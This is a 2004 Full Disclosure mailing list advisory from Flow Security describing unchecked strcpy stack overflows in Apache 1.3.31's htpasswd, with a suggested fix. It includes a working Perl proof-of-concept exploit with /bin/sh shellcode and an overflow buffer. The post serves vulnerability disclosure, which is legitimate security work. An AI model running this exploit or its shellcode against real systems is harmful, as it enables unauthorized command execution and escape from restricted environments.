Full Disclosure mailing list archives
FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advsory.
From: Luiz Fernando <luiz.fc () gmail com>
Date: Thu, 16 Sep 2004 13:23:03 -0300
********************************************************************************************** Flow Security foxtrot () flowsecurity org September 16nd, 2004 Luiz Fernando Camargo ----------------------------------------------------------------------------------------------------------------------------- Package Name: Apache htpasswd Vendor URL: http://www.apache.org Vendor Notified: Two months ago, but we got no answer. Date: 2004-09-16 ID: FST-#0001 Affected Version: 1.3.31 and prior versions. Risk: Execute arbitrary command, maybe evade apache chroot() ********************************************************************************************** [01] Package Description [02] The problem [03] Possibilities [04] Solution [05] Proof of Concept [06] Credits [01] Short Description Since htpasswd is part of apache software, here we got the apache description. Apache has been the most popular web server on the Internet since April of 1996. The October 2003 Netcraft Web Server Survey found that more than 64% of the web sites on the Internet are using Apache, thus making it more widely used than all other web servers combined. [02] The problem In apache/src/support/htpasswd.c were found lots of problems with strcpy. Unchecked buffers with user and passwd variables may let an attacker to take advantage of it. [03] Possibilities htpasswd is not setuid root by default. And it doesn't have any sense to do it yourself. So you can't gain root by exploiting these bugs directly. However, you can get out from apache's chroot environment since htpasswd usually stays in its environment. [04] Solution Take a good look in strcpy functions and maybe change it for strncpy function. [05] Proof of Concept -------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut------- #!/usr/bin/perl # Proof Of Concept exploit for htpasswd of Apache. # Read the advisory for more information. # - Luiz Fernando Camargo # - foxtrot () flowsecurity org $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68". "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; $target = "/usr/local/apache/bin/htpasswd"; $retaddr = 0xbffffffa - length($shellcode) - length($target); print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n"; local($ENV{'XXX'}) = $shellcode; $newret = pack('l', $retaddr); $buffer = "A" x 272; $buffer .= $newret x 4; $buffer .= " "; $buffer .= "B" x 290; exec("$target -nb $buffer"); -------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut------- [06] Credits Jefferson Cachinel Thyago Silva Rodrigo Rubira Branco Adriano Lima Jardir ph0enix cheers, Luiz Fernando Camargo www.flowsecurity.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advsory. Luiz Fernando (Sep 16)